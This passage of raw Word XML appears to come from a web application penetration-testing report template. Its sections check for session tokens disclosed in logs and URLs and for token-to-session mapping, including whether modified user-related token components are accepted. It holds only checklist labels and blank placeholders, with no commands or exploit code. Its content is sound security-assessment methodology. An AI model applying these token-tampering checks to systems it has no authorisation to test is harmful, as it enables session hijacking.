          </w:tcPr>
          <w:p w14:paraId="7E3C7C5C" w14:textId="04EA4FD7" w:rsidR="00C9204F" w:rsidRPr="003C713F" w:rsidRDefault="00C9204F" w:rsidP="00725128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5.3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B67A81" w:rsidRPr="00B67A81">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Check for Disclosure of Tokens in Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34E789DB" w14:textId="77777777" w:rsidR="0078503C" w:rsidRPr="003A4A96" w:rsidRDefault="0078503C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45"/>
        <w:gridCol w:w="3330"/>
        <w:gridCol w:w="3285"/>
      </w:tblGrid>
      <w:tr w:rsidR="00502745" w:rsidRPr="00502745" w14:paraId="56B80B98" w14:textId="77777777" w:rsidTr="00771FEA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614F46ED" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00771FE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0274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615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3960EEDB" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="0050274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02745" w:rsidRPr="00502745" w14:paraId="713067BC" w14:textId="77777777" w:rsidTr="00771FEA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6DA19D5C" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00771FE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02745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615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C1EB5C6" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="0050274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02745" w:rsidRPr="00502745" w14:paraId="6D3AA86D" w14:textId="77777777" w:rsidTr="00771FEA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69088C68" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00771FE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0274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615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EE5EABE" w14:textId="77777777" w:rsidR="00502745" w:rsidRDefault="00502745" w:rsidP="0050274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7FF6E64" w14:textId="77777777" w:rsidR="00EB3E8F" w:rsidRPr="00502745" w:rsidRDefault="00EB3E8F" w:rsidP="0050274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02745" w:rsidRPr="00502745" w14:paraId="4A9F48F7" w14:textId="77777777" w:rsidTr="00771FEA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7E5C3CFA" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00771FE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02745">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Users Authorized to Access Log Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="339C4BDE" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00502745">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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E173FAB" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00502745">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="76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CF2498E" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00502745">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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5FC9C88" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00502745">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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70E0658" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00502745">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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01617E3" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="0050274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02745" w:rsidRPr="00502745" w14:paraId="767D3A39" w14:textId="77777777" w:rsidTr="00771FEA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5BBEFBFA" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00771FE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02745">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Cases where the Web Application Transmits Session Tokens in the URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48D59444" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00502745">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="77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4A5C480" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00502745">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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6704D80" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00502745">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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D59E9AA" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00502745">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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D65E125" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00502745">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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87B1FBD" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="0050274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A46EA" w:rsidRPr="00502745" w14:paraId="152C0B4C" w14:textId="77777777" w:rsidTr="00771FEA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32C200BA" w14:textId="5C7B2F6C" w:rsidR="001A46EA" w:rsidRPr="00502745" w:rsidRDefault="001A46EA" w:rsidP="00771FE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A46EA">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Logs Analyzed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08450A4C" w14:textId="30D527CE" w:rsidR="001A46EA" w:rsidRPr="001C5809" w:rsidRDefault="001C5809" w:rsidP="001A46E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1C580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[*List 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the Logs</w:t>
            </w:r>
            <w:r w:rsidRPr="001C580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546D657" w14:textId="77777777" w:rsidR="001C5809" w:rsidRDefault="001C5809" w:rsidP="001A46E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7A2A1F5" w14:textId="72EEA55F" w:rsidR="001C5809" w:rsidRPr="00502745" w:rsidRDefault="001C5809" w:rsidP="001A46E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02745" w:rsidRPr="00502745" w14:paraId="65A6AC3A" w14:textId="77777777" w:rsidTr="00771FEA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3D2F8F1F" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00771FE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50274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Did you Bypass</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6492802F" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00771FE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0274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the Employed Security Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="333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34C88CD" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00502745">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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502745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28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A2918BC" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00502745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502745">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">No </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00502745" w:rsidRPr="00502745" w14:paraId="5D9469D2" w14:textId="77777777" w:rsidTr="00771FEA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462A154C" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00771FE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02745">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Instances where Session Tokens are transmitted within the URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="577FD17C" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="0050274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A6AB9" w:rsidRPr="00502745" w14:paraId="14CA82FA" w14:textId="77777777" w:rsidTr="00771FEA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0838262D" w14:textId="633CFC47" w:rsidR="002A6AB9" w:rsidRPr="00502745" w:rsidRDefault="002A6AB9" w:rsidP="00771FE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A6AB9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>API Keys or Authentication Tokens Found?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F4C954E" w14:textId="77777777" w:rsidR="002A6AB9" w:rsidRDefault="002A6AB9" w:rsidP="0050274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146BF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146BF9" w:rsidRPr="00146BF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Examples if Found]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0119FDD3" w14:textId="77777777" w:rsidR="00146BF9" w:rsidRDefault="00146BF9" w:rsidP="0050274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CD34651" w14:textId="77777777" w:rsidR="00146BF9" w:rsidRDefault="00146BF9" w:rsidP="0050274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D1D36C1" w14:textId="4EAC8902" w:rsidR="00146BF9" w:rsidRPr="00146BF9" w:rsidRDefault="00146BF9" w:rsidP="0050274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02745" w:rsidRPr="00502745" w14:paraId="5767A4BF" w14:textId="77777777" w:rsidTr="00771FEA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21AC8D16" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00771FE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0274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Valid Session Tokens</w:t>
            </w:r>
            <w:r w:rsidRPr="00502745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Issued to Users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73AD38C4" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00502745">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="612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146BF9" w:rsidRPr="00502745" w14:paraId="4B0A3E72" w14:textId="77777777" w:rsidTr="00771FEA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1A9F44D3" w14:textId="57FD1233" w:rsidR="00146BF9" w:rsidRPr="00502745" w:rsidRDefault="00146BF9" w:rsidP="00771FE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146BF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>Logs Capturing Full HTTP Requests or Headers?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63B4F7F2" w14:textId="77777777" w:rsidR="00146BF9" w:rsidRPr="00B76BF5" w:rsidRDefault="00B76BF5" w:rsidP="00146BF9">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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B76BF5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[*Yes/No, Details if Applicable]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76B6E821" w14:textId="77777777" w:rsidR="00B76BF5" w:rsidRDefault="00B76BF5" w:rsidP="00146BF9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  <w:p w14:paraId="7FF9410B" w14:textId="77777777" w:rsidR="00771FEA" w:rsidRDefault="00771FEA" w:rsidP="00146BF9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  <w:p w14:paraId="21EF2EF1" w14:textId="77777777" w:rsidR="00771FEA" w:rsidRDefault="00771FEA" w:rsidP="00146BF9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  <w:p w14:paraId="6B2023CC" w14:textId="3527EA22" w:rsidR="00B76BF5" w:rsidRPr="00502745" w:rsidRDefault="00B76BF5" w:rsidP="00146BF9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B76BF5" w:rsidRPr="00502745" w14:paraId="30CA4BE5" w14:textId="77777777" w:rsidTr="00771FEA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605E2ED7" w14:textId="5439C7A5" w:rsidR="00B76BF5" w:rsidRPr="00146BF9" w:rsidRDefault="00B76BF5" w:rsidP="00771FE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B76BF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Tokens Found in Query Strings or Stack Traces?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69E7DA83" w14:textId="77777777" w:rsidR="00B76BF5" w:rsidRDefault="008202D9" w:rsidP="00146BF9">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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Pr="008202D9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes/No, List of Affected Endpoints if Found</w:t>
            </w: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468348F2" w14:textId="77777777" w:rsidR="008202D9" w:rsidRDefault="008202D9" w:rsidP="00146BF9">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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461ADF57" w14:textId="77777777" w:rsidR="008202D9" w:rsidRDefault="008202D9" w:rsidP="00146BF9">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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3F7F2A36" w14:textId="77777777" w:rsidR="00771FEA" w:rsidRDefault="00771FEA" w:rsidP="00146BF9">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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1837D3F0" w14:textId="160531F1" w:rsidR="008202D9" w:rsidRPr="00B76BF5" w:rsidRDefault="008202D9" w:rsidP="00146BF9">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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502745" w:rsidRPr="00502745" w14:paraId="4487E1ED" w14:textId="77777777" w:rsidTr="00771FEA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3E2822CE" w14:textId="0B19BF11" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="008202D9" w:rsidP="00771FE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Other </w:t>
            </w:r>
            <w:r w:rsidR="00502745" w:rsidRPr="0050274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Sensitive Information Extracted from Session Tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A5A11AC" w14:textId="77777777" w:rsidR="00502745" w:rsidRDefault="00502745" w:rsidP="00502745">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="612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  <w:p w14:paraId="11202699" w14:textId="77777777" w:rsidR="00771FEA" w:rsidRDefault="00771FEA" w:rsidP="00502745">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="612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  <w:p w14:paraId="47D693C5" w14:textId="77777777" w:rsidR="00771FEA" w:rsidRDefault="00771FEA" w:rsidP="00771FEA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  <w:p w14:paraId="4287365C" w14:textId="77777777" w:rsidR="00771FEA" w:rsidRDefault="00771FEA" w:rsidP="00771FEA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  <w:p w14:paraId="24CC1680" w14:textId="77777777" w:rsidR="00771FEA" w:rsidRPr="00502745" w:rsidRDefault="00771FEA" w:rsidP="00771FEA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502745" w:rsidRPr="00502745" w14:paraId="4D1F3799" w14:textId="77777777" w:rsidTr="00771FEA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2BF30822" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00771FE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02745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615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="258BBB52" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00502745">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="78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C9E10C0" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00502745">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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6F59F64" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00502745">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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7F0B318" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00502745">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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8136B8C" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="00502745">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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C11ACCD" w14:textId="77777777" w:rsidR="00502745" w:rsidRPr="00502745" w:rsidRDefault="00502745" w:rsidP="0050274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75CAAB2F" w14:textId="77777777" w:rsidR="00C57283" w:rsidRPr="00A51A96" w:rsidRDefault="00C57283" w:rsidP="00C5728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57283" w14:paraId="65E6F4B0" w14:textId="77777777" w:rsidTr="00771FEA">
        <w:trPr>
          <w:trHeight w:val="3968"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B162ADF" w14:textId="77777777" w:rsidR="00C57283" w:rsidRDefault="00C57283" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1C77B682" w14:textId="77777777" w:rsidR="00C57283" w:rsidRDefault="00C57283" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="37A158B1" w14:textId="77777777" w:rsidR="00C57283" w:rsidRDefault="00C57283" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="43D4525F" w14:textId="77777777" w:rsidR="00C57283" w:rsidRDefault="00C57283" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4368D8B5" w14:textId="77777777" w:rsidR="00C57283" w:rsidRDefault="00C57283" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="284E7B8F" w14:textId="77777777" w:rsidR="00C57283" w:rsidRDefault="00C57283" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DA4972E" w14:textId="77777777" w:rsidR="00B67A81" w:rsidRDefault="00B67A81" w:rsidP="000947B4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F92492" w:rsidRPr="00A51A96" w14:paraId="615F6B90" w14:textId="77777777" w:rsidTr="001772BF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4933C027" w14:textId="4C39FDC8" w:rsidR="00F92492" w:rsidRPr="003C713F" w:rsidRDefault="00F92492" w:rsidP="00725128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5.4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A047A2" w:rsidRPr="00A047A2">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Check Mapping of Tokens to Sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7738422E" w14:textId="77777777" w:rsidR="00F92492" w:rsidRPr="0037386B" w:rsidRDefault="00F92492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4149"/>
        <w:gridCol w:w="2857"/>
      </w:tblGrid>
      <w:tr w:rsidR="00845495" w:rsidRPr="00845495" w14:paraId="65E748B6" w14:textId="77777777" w:rsidTr="0037386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75B0377" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="003738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4549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9A0B908" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="0084549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45495" w:rsidRPr="00845495" w14:paraId="5634DF56" w14:textId="77777777" w:rsidTr="0037386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4DD6207" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="003738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45495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C06A6AB" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="0084549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45495" w:rsidRPr="00845495" w14:paraId="0C777C90" w14:textId="77777777" w:rsidTr="0037386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568D1C4" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="003738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4549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14418C7" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="0084549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45495" w:rsidRPr="00845495" w14:paraId="0D28FEC0" w14:textId="77777777" w:rsidTr="0037386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EF253DD" w14:textId="4563DBA2" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="003738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45495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Does </w:t>
            </w:r>
            <w:r w:rsidR="0037386B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the </w:t>
            </w:r>
            <w:r w:rsidRPr="00845495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Application Issues New Session Tokens Each Time by Logging In and Out of the Browsers </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="414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1881DEE" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="00845495">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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845495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28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DF0E25E" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="00845495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845495">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">No </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00845495" w:rsidRPr="00845495" w14:paraId="39013627" w14:textId="77777777" w:rsidTr="0037386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8C1D3FA" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="003738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45495">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Does the tokens</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EEE21EB" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="003738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45495">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Contain components that Include Information Related to the Users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="414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0981733" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="00845495">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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845495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28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5BEEFC4" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="00845495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845495">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">No </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00845495" w:rsidRPr="00845495" w14:paraId="617A8BA9" w14:textId="77777777" w:rsidTr="0037386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E874B0F" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="003738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45495">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Modified User‐related Components of the Token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53B693E" w14:textId="77777777" w:rsidR="00845495" w:rsidRDefault="00845495" w:rsidP="0084549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AF8C2D6" w14:textId="77777777" w:rsidR="0037386B" w:rsidRDefault="0037386B" w:rsidP="0084549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75776F0" w14:textId="77777777" w:rsidR="0037386B" w:rsidRPr="00845495" w:rsidRDefault="0037386B" w:rsidP="0084549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45495" w:rsidRPr="00845495" w14:paraId="65BBEE3F" w14:textId="77777777" w:rsidTr="0037386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54CAE42" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="003738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45495">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Resulting Token Accepted by the</w:t>
            </w:r>
            <w:r w:rsidRPr="00845495"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 xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00845495">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Application Successfully</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="414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9C5E7FA" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="00845495">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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845495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28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8613F09" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="00845495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845495">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">No </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
